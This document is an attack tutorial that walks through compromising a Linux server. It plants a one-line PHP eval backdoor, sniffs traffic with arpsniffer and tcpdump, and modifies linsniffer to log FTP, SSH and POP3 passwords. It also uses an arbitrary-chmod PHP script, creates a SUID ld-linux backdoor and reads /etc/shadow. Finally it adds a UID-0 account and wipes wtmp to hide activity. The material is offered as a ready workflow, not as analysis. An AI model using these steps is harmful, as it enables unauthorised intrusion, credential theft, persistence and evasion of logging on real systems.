How to Deploy a One‑Line PHP Backdoor and Escalate Linux Privileges

Creating a PHP Backdoor

Write a one‑line PHP backdoor and upload it to the target: <?php @eval($_POST[md5])?> Verify the file:

cat rankuplog_time.php

Obtaining an Interactive Shell

Use Python’s pty module to spawn a fully interactive shell (most systems have Python installed): python -c 'import pty; pty.spawn("/bin/sh")' Check the current user: id Typical output shows a non‑root UID, e.g., uid=529(zeicom) gid=525(zeicom). Determine the kernel version: uname -r Example output: 2.6.18-164.11.1.el5PAE.

Linux Privilege‑Escalation Vectors

Common paths include third‑party software vulnerabilities, local trust features, and kernel overflows. Exploit databases such as http://tools.90sec.org/, http://sebug.net/paper/linux_exp/, http://x73.cc/bitch/exp/, and http://www.exploit-db.com/search/ provide relevant payloads.

Compiling and Using arpsniffer

Install required libraries:

rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz
tar zxvf libpcap-0.8.1.tar.gz
cd libpcap-0.8.1
./configure
make
make install

Compile the sniffer:

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

Run it against the target network (example IPs):

./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

Capturing Traffic with tcpdump

Listen for traffic from the mail server: tcpdump -i eth0 host 192.168.0.11 Save captured packets to a file for later analysis:

tcpdump -i eth0 host 172.16.0.12 -w pop.txt

Modifying linsniffer.c to Capture Credentials

Adjust the destination‑port checks to target services of interest (e.g., FTP, SSH, Telnet, HTTP, POP3, Rlogin, POPPASS):

if(ntohs(tcp->dest)==21)  p=1; /* ftp */
if(ntohs(tcp->dest)==22)  p=1; /* ssh */
if(ntohs(tcp->dest)==23)  p=1; /* telnet */
if(ntohs(tcp->dest)==80)  p=1; /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

Compile and run:

gcc -o linsniffer linsniffer.c
./linsniffer

Captured usernames and passwords are stored in tcp.log.

Cross‑Directory PHP Exploit

When privilege escalation fails, a simple PHP script can attempt to change permissions on an arbitrary path:

$path = stripslashes($_GET['path']);
$ok = chmod($path, 0777);
if($ok) echo "CHMOD OK, permission editable file or directory.";

Save as tmdsb.php and invoke, for example:

http://www.tmdsb.com/tmdsb.php?path=../../target_dir/index.php

Udev‑Based Privilege Escalation (Kernel ≤ 2.6.*)

Upload the exploit source files, make them executable, and run the overflow binary to obtain a root shell.

Create a SUID copy of ld-linux.so.2:

cp /lib/ld-linux.so.2 /tmp/.str1ven
chmod +s /tmp/.str1ven

Execute the backdoor to regain root:

/tmp/.str1ven `which whoami`

Post‑Exploitation Enumeration

Common commands to gather system information:

cat /etc/passwd
cat /etc/shadow
ifconfig
netstat -an | grep LISTEN
service --status-all | grep running
lsb_release -a

Modify SSH configuration to allow password authentication:

sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /etc/ssh/sshd_config
service sshd restart

Alter /etc/passwd to give a user UID 0, or directly add a root‑equivalent account:

sed -i 's/bin:x:1:1/bin:x:0:1/' /etc/passwd
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd

Clear login records to hide activity:

cp /dev/null /var/log/wtmp

Additional Tools

Compile a static protocol tester: gcc prtcl2.c -o local -static -Wall Create a large dummy file for certain kernel exploits: dd if=/dev/zero of=bigfile bs=10M count=10 All the above steps illustrate a typical workflow for gaining and maintaining root access on vulnerable Linux systems.